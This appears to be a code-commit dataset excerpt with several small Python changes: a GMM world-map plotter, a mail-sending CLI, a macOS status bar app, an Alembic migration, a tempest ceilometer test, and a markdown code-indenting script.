(best_lat, best_lon) = gmm.means_[np.argmax(gmm.weights_)]
best_lat, best_lon = m(best_lon, best_lat)
plt.plot(best_lat, best_lon, '*g')
# If provided also plot the true lat/lon expected to come in as lat,lon
if true_ll:
lat, lon = m(true_ll[1], true_ll[0])
plt.plot(lat, lon, '*b')
#plots the center of each ellipse and weights the size relative to the weight of the ellipse on the model
for i in range (0, gmm.n_components):
lat, lon = gmm.means_[i]
weight = gmm.weights_[i]
x, y = m(lon, lat)
plt.plot(x, y, 'ok', markersize=10*weight)
plt.show()
|
Add a method which will plot the contour map of a GMM on a map of the world as well as the best location and true position if givenimport numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
@staticmethod
def plot_gmm(gmm, true_ll=False):
"""Plots the contour map of a GMM on top of a world map
Partially from: http://matplotlib.org/basemap/users/examples.html
Will also plot the best estimated location as well as a true location if passed in"""
plt.figure()
x = np.linspace(-180,180, num=3600)
y = np.linspace(90,-90, num=180)
#GMM uses lat, lon so must flip in to obtain the contours correctly
X, Y = np.meshgrid(y,x)
XX = np.array([X.ravel(), Y.ravel()]).T
#Obtains the per-sample log probabilities of the data under the model
Z = -gmm.score_samples(XX)[0]
Z = Z.reshape(X.shape)
#set up and draw the world map
m = Basemap(projection='mill', lon_0=0)
m.drawcountries()
m.drawcoastlines()
m.drawparallels(np.arange(-90.,120.,30.),labels=[1,0,0,0]) # draw parallels
m.drawmeridians(np.arange(0.,420.,60.),labels=[0,0,0,1]) # draw meridians
cmap = mpl.cm.pink
#for plotting we want to be back in lon, lat space so flip back
X, Y = m(Y,X)
#plot the contour lines as well as a color bar
CS = m.contourf(X, Y, Z, 25, cmap=cmap)
CB = plt.colorbar(CS, shrink=0.8, extend='both')
# Plot estimated location
(best_lat, best_lon) = gmm.means_[np.argmax(gmm.weights_)]
best_lat, best_lon = m(best_lon, best_lat)
plt.plot(best_lat, best_lon, '*g')
# If provided also plot the true lat/lon expected to come in as lat,lon
if true_ll:
lat, lon = m(true_ll[1], true_ll[0])
plt.plot(lat, lon, '*b')
#plots the center of each ellipse and weights the size relative to the weight of the ellipse on the model
for i in range (0, gmm.n_components):
lat, lon = gmm.means_[i]
weight = gmm.weights_[i]
x, y = m(lon, lat)
plt.plot(x, y, 'ok', markersize=10*weight)
plt.show()
|
<commit_before><commit_msg>Add a method which will plot the contour map of a GMM on a map of the world as well as the best location and true position if given<commit_after>import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
@staticmethod
def plot_gmm(gmm, true_ll=False):
"""Plots the contour map of a GMM on top of a world map
Partially from: http://matplotlib.org/basemap/users/examples.html
Will also plot the best estimated location as well as a true location if passed in"""
plt.figure()
x = np.linspace(-180,180, num=3600)
y = np.linspace(90,-90, num=180)
#GMM uses lat, lon so must flip in to obtain the contours correctly
X, Y = np.meshgrid(y,x)
XX = np.array([X.ravel(), Y.ravel()]).T
#Obtains the per-sample log probabilities of the data under the model
Z = -gmm.score_samples(XX)[0]
Z = Z.reshape(X.shape)
#set up and draw the world map
m = Basemap(projection='mill', lon_0=0)
m.drawcountries()
m.drawcoastlines()
m.drawparallels(np.arange(-90.,120.,30.),labels=[1,0,0,0]) # draw parallels
m.drawmeridians(np.arange(0.,420.,60.),labels=[0,0,0,1]) # draw meridians
cmap = mpl.cm.pink
#for plotting we want to be back in lon, lat space so flip back
X, Y = m(Y,X)
#plot the contour lines as well as a color bar
CS = m.contourf(X, Y, Z, 25, cmap=cmap)
CB = plt.colorbar(CS, shrink=0.8, extend='both')
# Plot estimated location
(best_lat, best_lon) = gmm.means_[np.argmax(gmm.weights_)]
best_lat, best_lon = m(best_lon, best_lat)
plt.plot(best_lat, best_lon, '*g')
# If provided also plot the true lat/lon expected to come in as lat,lon
if true_ll:
lat, lon = m(true_ll[1], true_ll[0])
plt.plot(lat, lon, '*b')
#plots the center of each ellipse and weights the size relative to the weight of the ellipse on the model
for i in range (0, gmm.n_components):
lat, lon = gmm.means_[i]
weight = gmm.weights_[i]
x, y = m(lon, lat)
plt.plot(x, y, 'ok', markersize=10*weight)
plt.show()
|
|
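Two notes on the plotter above. First, @staticmethod on a module-level function leaves plot_gmm uncallable as written, since staticmethod objects only resolve through a class; the decorator should be dropped (or the function moved into a class) before use. Second, the negated score_samples(XX)[0] matches the pre-0.18 sklearn.mixture.GMM API, in which score_samples returned a (log-probability, responsibilities) tuple. A hedged usage sketch under those assumptions, with made-up coordinates:

import numpy as np
from sklearn.mixture import GMM  # pre-0.18 API assumed by plot_gmm

points = np.column_stack([np.random.uniform(-60, 60, 500),     # latitudes
                          np.random.uniform(-180, 180, 500)])  # longitudes
gmm = GMM(n_components=3, covariance_type='full').fit(points)
plot_gmm(gmm, true_ll=(48.85, 2.35))  # optional true (lat, lon)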
da87b9fafcb1bec8541d11f1f2650c7cd86c22c0
|
src/send_mails.py
|
src/send_mails.py
|
from argparse import ArgumentParser
from teammails import informal_to_teams
def parse_args():
args = ArgumentParser()
args.add_argument("--nodebug", help="do really send the mails to the teams", action="store_true")
subs = args.add_subparsers()
informal = subs.add_parser("informal", help="send informal mails")
informal.add_argument("-s", "--subject", help="set the mail subject", required=True)
informal.add_argument("-t", "--templatename", help="set the name of the template to use", required=True)
informal.set_defaults(func=cmd_send_informal)
return args.parse_args()
def cmd_send_informal(args):
informal_to_teams(args.templatename, args.subject, not args.nodebug)
if __name__ == "__main__":
args = parse_args()
args.func(args)
|
Add a script to invoke the mail sending.
|
Add a script to invoke the mail sending.
|
Python
|
bsd-3-clause
|
eXma/meet-and-eat-registration-system,eXma/meet-and-eat-registration-system,janLo/meet-and-eat-registration-system,eXma/meet-and-eat-registration-system,janLo/meet-and-eat-registration-system,janLo/meet-and-eat-registration-system,janLo/meet-and-eat-registration-system,eXma/meet-and-eat-registration-system
|
Add a script to invoke the mail sending.
|
from argparse import ArgumentParser
from teammails import informal_to_teams
def parse_args():
args = ArgumentParser()
args.add_argument("--nodebug", help="do really send the mails to the teams", action="store_true")
subs = args.add_subparsers()
informal = subs.add_parser("informal", help="send informal mails")
informal.add_argument("-s", "--subject", help="set the mail subject", required=True)
informal.add_argument("-t", "--templatename", help="set the name of the template to use", required=True)
informal.set_defaults(func=cmd_send_informal)
return args.parse_args()
def cmd_send_informal(args):
informal_to_teams(args.templatename, args.subject, not args.nodebug)
if __name__ == "__main__":
args = parse_args()
args.func(args)
|
<commit_before><commit_msg>Add a script to invoke the mail sending.<commit_after>
|
from argparse import ArgumentParser
from teammails import informal_to_teams
def parse_args():
args = ArgumentParser()
args.add_argument("--nodebug", help="do really send the mails to the teams", action="store_true")
subs = args.add_subparsers()
informal = subs.add_parser("informal", help="send informal mails")
informal.add_argument("-s", "--subject", help="set the mail subject", required=True)
informal.add_argument("-t", "--templatename", help="set the name of the template to use", required=True)
informal.set_defaults(func=cmd_send_informal)
return args.parse_args()
def cmd_send_informal(args):
informal_to_teams(args.templatename, args.subject, not args.nodebug)
if __name__ == "__main__":
args = parse_args()
args.func(args)
|
Add a script to invoke the mail sending.from argparse import ArgumentParser
from teammails import informal_to_teams
def parse_args():
args = ArgumentParser()
args.add_argument("--nodebug", help="do really send the mails to the teams", action="store_true")
subs = args.add_subparsers()
informal = subs.add_parser("informal", help="send informal mails")
informal.add_argument("-s", "--subject", help="set the mail subject", required=True)
informal.add_argument("-t", "--templatename", help="set the name of the template to use", required=True)
informal.set_defaults(func=cmd_send_informal)
return args.parse_args()
def cmd_send_informal(args):
informal_to_teams(args.templatename, args.subject, not args.nodebug)
if __name__ == "__main__":
args = parse_args()
args.func(args)
|
<commit_before><commit_msg>Add a script to invoke the mail sending.<commit_after>from argparse import ArgumentParser
from teammails import informal_to_teams
def parse_args():
args = ArgumentParser()
args.add_argument("--nodebug", help="do really send the mails to the teams", action="store_true")
subs = args.add_subparsers()
informal = subs.add_parser("informal", help="send informal mails")
informal.add_argument("-s", "--subject", help="set the mail subject", required=True)
informal.add_argument("-t", "--templatename", help="set the name of the template to use", required=True)
informal.set_defaults(func=cmd_send_informal)
return args.parse_args()
def cmd_send_informal(args):
informal_to_teams(args.templatename, args.subject, not args.nodebug)
if __name__ == "__main__":
args = parse_args()
args.func(args)
|
|
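For reference, the dispatch in the script above runs through set_defaults(func=...): parse_args() returns a namespace whose func attribute is cmd_send_informal whenever the informal subcommand is chosen. A hedged illustration with made-up argument values; note that --nodebug must precede the subcommand, since it belongs to the top-level parser:

import sys
sys.argv = ["send_mails.py", "--nodebug", "informal",
            "-s", "Test run", "-t", "informal_template"]
args = parse_args()   # from the script above
args.func(args)       # dispatches to cmd_send_informal -> informal_to_teams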
a4b5e6f522e3c9af502e6fbddd0dbefbae491c2e
|
src/server/app.py
|
src/server/app.py
|
import rumps
import threading
from server import CamsketchServer
class CamsketchStatusBarApp(rumps.App):
def __init__(self, address):
super(CamsketchStatusBarApp, self).__init__("Camsketch")
self.menu = [address]
if __name__ == "__main__":
server = CamsketchServer()
threading.Thread(target=server.serve_forever).start()
app = CamsketchStatusBarApp(server.address)
app.run()
server.shutdown()
|
Add status bar module to server.
|
Add status bar module to server.
|
Python
|
mit
|
pdubroy/camsketch,pdubroy/camsketch,pdubroy/camsketch,pdubroy/camsketch
|
Add status bar module to server.
|
import rumps
import threading
from server import CamsketchServer
class CamsketchStatusBarApp(rumps.App):
def __init__(self, address):
super(CamsketchStatusBarApp, self).__init__("Camsketch")
self.menu = [address]
if __name__ == "__main__":
server = CamsketchServer()
threading.Thread(target=server.serve_forever).start()
app = CamsketchStatusBarApp(server.address)
app.run()
server.shutdown()
|
<commit_before><commit_msg>Add status bar module to server.<commit_after>
|
import rumps
import threading
from server import CamsketchServer
class CamsketchStatusBarApp(rumps.App):
def __init__(self, address):
super(CamsketchStatusBarApp, self).__init__("Camsketch")
self.menu = [address]
if __name__ == "__main__":
server = CamsketchServer()
threading.Thread(target=server.serve_forever).start()
app = CamsketchStatusBarApp(server.address)
app.run()
server.shutdown()
|
Add status bar module to server.import rumps
import threading
from server import CamsketchServer
class CamsketchStatusBarApp(rumps.App):
def __init__(self, address):
super(CamsketchStatusBarApp, self).__init__("Camsketch")
self.menu = [address]
if __name__ == "__main__":
server = CamsketchServer()
threading.Thread(target=server.serve_forever).start()
app = CamsketchStatusBarApp(server.address)
app.run()
server.shutdown()
|
<commit_before><commit_msg>Add status bar module to server.<commit_after>import rumps
import threading
from server import CamsketchServer
class CamsketchStatusBarApp(rumps.App):
def __init__(self, address):
super(CamsketchStatusBarApp, self).__init__("Camsketch")
self.menu = [address]
if __name__ == "__main__":
server = CamsketchServer()
threading.Thread(target=server.serve_forever).start()
app = CamsketchStatusBarApp(server.address)
app.run()
server.shutdown()
|
|
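The script above relies on the usual run-the-server-on-a-worker-thread pattern: rumps' app.run() blocks the main thread, so serve_forever() runs in the background and shutdown() is reached only once the status bar app quits. The same shape with only the stdlib, assuming CamsketchServer mirrors socketserver's serve_forever/shutdown pair:

import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler

server = HTTPServer(("127.0.0.1", 0), SimpleHTTPRequestHandler)
worker = threading.Thread(target=server.serve_forever)
worker.start()
print("serving on", server.server_address)
# ... a blocking UI loop sits here, like app.run() above ...
server.shutdown()   # unblocks serve_forever in the worker thread
worker.join()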
ed56e054d74be6d77209aa03fd532d8a9e9f4e98
|
zou/migrations/versions/818f7bda2528_.py
|
zou/migrations/versions/818f7bda2528_.py
|
"""empty message
Revision ID: 818f7bda2528
Revises: bf1347acdee2
Create Date: 2018-04-10 22:45:19.462757
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '818f7bda2528'
down_revision = 'bf1347acdee2'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('preview_file', sa.Column('path', sa.String(length=400), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('preview_file', 'path')
# ### end Alembic commands ###
|
Add migration file for preview path field
|
Add migration file for preview path field
|
Python
|
agpl-3.0
|
cgwire/zou
|
Add migration file for preview path field
|
"""empty message
Revision ID: 818f7bda2528
Revises: bf1347acdee2
Create Date: 2018-04-10 22:45:19.462757
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '818f7bda2528'
down_revision = 'bf1347acdee2'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('preview_file', sa.Column('path', sa.String(length=400), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('preview_file', 'path')
# ### end Alembic commands ###
|
<commit_before><commit_msg>Add migration file for preview path field<commit_after>
|
"""empty message
Revision ID: 818f7bda2528
Revises: bf1347acdee2
Create Date: 2018-04-10 22:45:19.462757
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '818f7bda2528'
down_revision = 'bf1347acdee2'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('preview_file', sa.Column('path', sa.String(length=400), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('preview_file', 'path')
# ### end Alembic commands ###
|
Add migration file for preview path field"""empty message
Revision ID: 818f7bda2528
Revises: bf1347acdee2
Create Date: 2018-04-10 22:45:19.462757
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '818f7bda2528'
down_revision = 'bf1347acdee2'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('preview_file', sa.Column('path', sa.String(length=400), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('preview_file', 'path')
# ### end Alembic commands ###
|
<commit_before><commit_msg>Add migration file for preview path field<commit_after>"""empty message
Revision ID: 818f7bda2528
Revises: bf1347acdee2
Create Date: 2018-04-10 22:45:19.462757
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '818f7bda2528'
down_revision = 'bf1347acdee2'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('preview_file', sa.Column('path', sa.String(length=400), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('preview_file', 'path')
# ### end Alembic commands ###
|
|
069b48615b13540c2b1d4a4d62eeaa564416718c
|
contrib/tempest/tempest/scenario/congress_datasources/test_ceilometer.py
|
contrib/tempest/tempest/scenario/congress_datasources/test_ceilometer.py
|
# Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest import clients
from tempest import config
from tempest import exceptions
from tempest.openstack.common import log as logging
from tempest.scenario import manager_congress
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class TestCeilometerDriver(manager_congress.ScenarioPolicyBase):
@classmethod
def check_preconditions(cls):
super(TestCeilometerDriver, cls).check_preconditions()
def setUp(cls):
super(TestCeilometerDriver, cls).setUp()
if not CONF.service_available.ceilometer:
msg = ("%s skipped as ceilometer is not available" % cls.__name__)
raise cls.skipException(msg)
cls.os = clients.Manager(cls.admin_credentials())
cls.telemetry_client = cls.os.telemetry_client
@test.attr(type='smoke')
def test_ceilometer_meters_table(self):
_, meters = self.telemetry_client.list_meters()
meter_map = {}
for meter in meters:
meter_map[meter['meter_id']] = meter
meter_schema = \
self.admin_manager.congress_client.show_datasource_table_schema(
'ceilometer', 'meters')['columns']
def _check_data_table_ceilometer_meters():
results = \
self.admin_manager.congress_client.list_datasource_rows(
'ceilometer', 'meters')
for row in results['results']:
meter_row = meter_map[row['data'][0]]
for index in range(len(meter_schema)):
if (str(row['data'][index]) !=
str(meter_row[meter_schema[index]['name']])):
return False
return True
if not test.call_until_true(func=_check_data_table_ceilometer_meters,
duration=20, sleep_for=4):
raise exceptions.TimeoutException("Data did not converge in time "
"or failure in server")
|
Add tempest code coverage for ceilometer driver
|
Add tempest code coverage for ceilometer driver
Change-Id: I6dc9200d1096823e9046fbfcae3222ffb2c21ff5
Closes-Bug: #1378133
|
Python
|
apache-2.0
|
ekcs/congress,ramineni/my_congress,ekcs/congress,openstack/congress,ramineni/my_congress,ramineni/my_congress,openstack/congress,ramineni/my_congress,ekcs/congress,ekcs/congress
|
Add tempest code coverage for ceilometer driver
Change-Id: I6dc9200d1096823e9046fbfcae3222ffb2c21ff5
Closes-Bug: #1378133
|
# Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest import clients
from tempest import config
from tempest import exceptions
from tempest.openstack.common import log as logging
from tempest.scenario import manager_congress
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class TestCeilometerDriver(manager_congress.ScenarioPolicyBase):
@classmethod
def check_preconditions(cls):
super(TestCeilometerDriver, cls).check_preconditions()
def setUp(cls):
super(TestCeilometerDriver, cls).setUp()
if not CONF.service_available.ceilometer:
msg = ("%s skipped as ceilometer is not available" % cls.__name__)
raise cls.skipException(msg)
cls.os = clients.Manager(cls.admin_credentials())
cls.telemetry_client = cls.os.telemetry_client
@test.attr(type='smoke')
def test_ceilometer_meters_table(self):
_, meters = self.telemetry_client.list_meters()
meter_map = {}
for meter in meters:
meter_map[meter['meter_id']] = meter
meter_schema = \
self.admin_manager.congress_client.show_datasource_table_schema(
'ceilometer', 'meters')['columns']
def _check_data_table_ceilometer_meters():
results = \
self.admin_manager.congress_client.list_datasource_rows(
'ceilometer', 'meters')
for row in results['results']:
meter_row = meter_map[row['data'][0]]
for index in range(len(meter_schema)):
if (str(row['data'][index]) !=
str(meter_row[meter_schema[index]['name']])):
return False
return True
if not test.call_until_true(func=_check_data_table_ceilometer_meters,
duration=20, sleep_for=4):
raise exceptions.TimeoutException("Data did not converge in time "
"or failure in server")
|
<commit_before><commit_msg>Add tempest code coverage for ceilometer driver
Change-Id: I6dc9200d1096823e9046fbfcae3222ffb2c21ff5
Closes-Bug: #1378133<commit_after>
|
# Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest import clients
from tempest import config
from tempest import exceptions
from tempest.openstack.common import log as logging
from tempest.scenario import manager_congress
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class TestCeilometerDriver(manager_congress.ScenarioPolicyBase):
@classmethod
def check_preconditions(cls):
super(TestCeilometerDriver, cls).check_preconditions()
def setUp(cls):
super(TestCeilometerDriver, cls).setUp()
if not CONF.service_available.ceilometer:
msg = ("%s skipped as ceilometer is not available" % cls.__name__)
raise cls.skipException(msg)
cls.os = clients.Manager(cls.admin_credentials())
cls.telemetry_client = cls.os.telemetry_client
@test.attr(type='smoke')
def test_ceilometer_meters_table(self):
_, meters = self.telemetry_client.list_meters()
meter_map = {}
for meter in meters:
meter_map[meter['meter_id']] = meter
meter_schema = \
self.admin_manager.congress_client.show_datasource_table_schema(
'ceilometer', 'meters')['columns']
def _check_data_table_ceilometer_meters():
results = \
self.admin_manager.congress_client.list_datasource_rows(
'ceilometer', 'meters')
for row in results['results']:
meter_row = meter_map[row['data'][0]]
for index in range(len(meter_schema)):
if (str(row['data'][index]) !=
str(meter_row[meter_schema[index]['name']])):
return False
return True
if not test.call_until_true(func=_check_data_table_ceilometer_meters,
duration=20, sleep_for=4):
raise exceptions.TimeoutException("Data did not converge in time "
"or failure in server")
|
Add tempest code coverage for ceilometer driver
Change-Id: I6dc9200d1096823e9046fbfcae3222ffb2c21ff5
Closes-Bug: #1378133# Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest import clients
from tempest import config
from tempest import exceptions
from tempest.openstack.common import log as logging
from tempest.scenario import manager_congress
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class TestCeilometerDriver(manager_congress.ScenarioPolicyBase):
@classmethod
def check_preconditions(cls):
super(TestCeilometerDriver, cls).check_preconditions()
def setUp(cls):
super(TestCeilometerDriver, cls).setUp()
if not CONF.service_available.ceilometer:
msg = ("%s skipped as ceilometer is not available" % cls.__name__)
raise cls.skipException(msg)
cls.os = clients.Manager(cls.admin_credentials())
cls.telemetry_client = cls.os.telemetry_client
@test.attr(type='smoke')
def test_ceilometer_meters_table(self):
_, meters = self.telemetry_client.list_meters()
meter_map = {}
for meter in meters:
meter_map[meter['meter_id']] = meter
meter_schema = \
self.admin_manager.congress_client.show_datasource_table_schema(
'ceilometer', 'meters')['columns']
def _check_data_table_ceilometer_meters():
results = \
self.admin_manager.congress_client.list_datasource_rows(
'ceilometer', 'meters')
for row in results['results']:
meter_row = meter_map[row['data'][0]]
for index in range(len(meter_schema)):
if (str(row['data'][index]) !=
str(meter_row[meter_schema[index]['name']])):
return False
return True
if not test.call_until_true(func=_check_data_table_ceilometer_meters,
duration=20, sleep_for=4):
raise exceptions.TimeoutException("Data did not converge in time "
"or failure in server")
|
<commit_before><commit_msg>Add tempest code coverage for ceilometer driver
Change-Id: I6dc9200d1096823e9046fbfcae3222ffb2c21ff5
Closes-Bug: #1378133<commit_after># Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest import clients
from tempest import config
from tempest import exceptions
from tempest.openstack.common import log as logging
from tempest.scenario import manager_congress
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class TestCeilometerDriver(manager_congress.ScenarioPolicyBase):
@classmethod
def check_preconditions(cls):
super(TestCeilometerDriver, cls).check_preconditions()
def setUp(cls):
super(TestCeilometerDriver, cls).setUp()
if not CONF.service_available.ceilometer:
msg = ("%s skipped as ceilometer is not available" % cls.__name__)
raise cls.skipException(msg)
cls.os = clients.Manager(cls.admin_credentials())
cls.telemetry_client = cls.os.telemetry_client
@test.attr(type='smoke')
def test_ceilometer_meters_table(self):
_, meters = self.telemetry_client.list_meters()
meter_map = {}
for meter in meters:
meter_map[meter['meter_id']] = meter
meter_schema = \
self.admin_manager.congress_client.show_datasource_table_schema(
'ceilometer', 'meters')['columns']
def _check_data_table_ceilometer_meters():
results = \
self.admin_manager.congress_client.list_datasource_rows(
'ceilometer', 'meters')
for row in results['results']:
meter_row = meter_map[row['data'][0]]
for index in range(len(meter_schema)):
if (str(row['data'][index]) !=
str(meter_row[meter_schema[index]['name']])):
return False
return True
if not test.call_until_true(func=_check_data_table_ceilometer_meters,
duration=20, sleep_for=4):
raise exceptions.TimeoutException("Data did not converge in time "
"or failure in server")
|
|
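A side note on the convergence check in the test above: tempest's test.call_until_true is a plain polling helper. Roughly — this is a simplified restatement for readers, not the tempest source — it behaves like:

    import time

    def call_until_true(func, duration, sleep_for):
        # invoke func every sleep_for seconds until it returns True,
        # giving up once duration seconds have elapsed
        deadline = time.time() + duration
        while time.time() < deadline:
            if func():
                return True
            time.sleep(sleep_for)
        return False

so the test retries the row-by-row comparison for up to 20 seconds, sleeping 4 seconds between attempts, before raising TimeoutException.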
f3a5546d39a6430f60c9a34f279bf1e7b22076da
|
small-functions/add-tab-for-nonstandard-md-code.py
|
small-functions/add-tab-for-nonstandard-md-code.py
|
#!/usr/bin/env python
#encoding:utf-8
import os
import time
def add_tab(path):
with open(path,'r') as f:
flag = False
data = ''
tmp = '111'
count = 0
while tmp != '':
tmp = f.readline()
if tmp == '```\n':
if flag:
flag = False
else:
flag = True
data += tmp
continue
if flag:
if tmp != '\n':
data += ' ' + tmp
# data += tmp[4:]
count += 1
else:
data += tmp
with open(path,'w') as f:
f.write(data)
return count
def traverse(rootDir):
list_dirs = os.walk(rootDir)
for root, dirs, files in list_dirs:
for d in dirs:
print os.path.join(root, d)
for f in files:
path = os.path.join(root, f)
if os.path.getmtime(path) > 1449214271 or os.path.getmtime(path) < 1449212309:
print '>>' + path + '\n modified ',
print add_tab(path),
print 'lines'
if __name__ == '__main__':
traverse('/home/hanks/kiya/blog/source/_posts')
|
USE STANDARD MARKDOWN GRAMMAR!!!!! ESPECIALLY CODE!!
|
USE STANDARD MARKDOWN GRAMMAR!!!!! ESPECIALLY CODE!!
|
Python
|
apache-2.0
|
kiya-z/Kython
|
USE STANDARD MARKDOWN GRAMMAR!!!!! ESPECIALLY CODE!!
|
#!/usr/bin/env python
#encoding:utf-8
import os
import time
def add_tab(path):
with open(path,'r') as f:
flag = False
data = ''
tmp = '111'
count = 0
while tmp != '':
tmp = f.readline()
if tmp == '```\n':
if flag:
flag = False
else:
flag = True
data += tmp
continue
if flag:
if tmp != '\n':
data += ' ' + tmp
# data += tmp[4:]
count += 1
else:
data += tmp
with open(path,'w') as f:
f.write(data)
return count
def traverse(rootDir):
list_dirs = os.walk(rootDir)
for root, dirs, files in list_dirs:
for d in dirs:
print os.path.join(root, d)
for f in files:
path = os.path.join(root, f)
if os.path.getmtime(path) > 1449214271 or os.path.getmtime(path) < 1449212309:
print '>>' + path + '\n modified ',
print add_tab(path),
print 'lines'
if __name__ == '__main__':
traverse('/home/hanks/kiya/blog/source/_posts')
|
<commit_before><commit_msg>USE STANDARD MARKDOWN GRAMMAR!!!!! ESPECIALLY CODE!!<commit_after>
|
#!/usr/bin/env python
#encoding:utf-8
import os
import time
def add_tab(path):
with open(path,'r') as f:
flag = False
data = ''
tmp = '111'
count = 0
while tmp != '':
tmp = f.readline()
if tmp == '```\n':
if flag:
flag = False
else:
flag = True
data += tmp
continue
if flag:
if tmp != '\n':
data += ' ' + tmp
# data += tmp[4:]
count += 1
else:
data += tmp
with open(path,'w') as f:
f.write(data)
return count
def traverse(rootDir):
list_dirs = os.walk(rootDir)
for root, dirs, files in list_dirs:
for d in dirs:
print os.path.join(root, d)
for f in files:
path = os.path.join(root, f)
if os.path.getmtime(path) > 1449214271 or os.path.getmtime(path) < 1449212309:
print '>>' + path + '\n modified ',
print add_tab(path),
print 'lines'
if __name__ == '__main__':
traverse('/home/hanks/kiya/blog/source/_posts')
|
USE STANDARD MARKDOWN GRAMMAR!!!!! ESPECIALLY CODE!!#!/usr/bin/env python
#encoding:utf-8
import os
import time
def add_tab(path):
with open(path,'r') as f:
flag = False
data = ''
tmp = '111'
count = 0
while tmp != '':
tmp = f.readline()
if tmp == '```\n':
if flag:
flag = False
else:
flag = True
data += tmp
continue
if flag:
if tmp != '\n':
data += ' ' + tmp
# data += tmp[4:]
count += 1
else:
data += tmp
with open(path,'w') as f:
f.write(data)
return count
def traverse(rootDir):
list_dirs = os.walk(rootDir)
for root, dirs, files in list_dirs:
for d in dirs:
print os.path.join(root, d)
for f in files:
path = os.path.join(root, f)
if os.path.getmtime(path) > 1449214271 or os.path.getmtime(path) < 1449212309:
print '>>' + path + '\n modified ',
print add_tab(path),
print 'lines'
if __name__ == '__main__':
traverse('/home/hanks/kiya/blog/source/_posts')
|
<commit_before><commit_msg>USE STANDARD MARKDOWN GRAMMAR!!!!! ESPECIALLY CODE!!<commit_after>#!/usr/bin/env python
#encoding:utf-8
import os
import time
def add_tab(path):
with open(path,'r') as f:
flag = False
data = ''
tmp = '111'
count = 0
while tmp != '':
tmp = f.readline()
if tmp == '```\n':
if flag:
flag = False
else:
flag = True
data += tmp
continue
if flag:
if tmp != '\n':
data += ' ' + tmp
# data += tmp[4:]
count += 1
else:
data += tmp
with open(path,'w') as f:
f.write(data)
return count
def traverse(rootDir):
list_dirs = os.walk(rootDir)
for root, dirs, files in list_dirs:
for d in dirs:
print os.path.join(root, d)
for f in files:
path = os.path.join(root, f)
if os.path.getmtime(path) > 1449214271 or os.path.getmtime(path) < 1449212309:
print '>>' + path + '\n modified ',
print add_tab(path),
print 'lines'
if __name__ == '__main__':
traverse('/home/hanks/kiya/blog/source/_posts')
|
|
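A caveat on the fence handling in the script above, for anyone reusing it: the check tmp == '```\n' only matches bare fences, so language-tagged openers such as ```python (or a closing fence with trailing whitespace) never toggle the flag and their block is skipped. A slightly more tolerant variant — a sketch, not the original behavior — would be:

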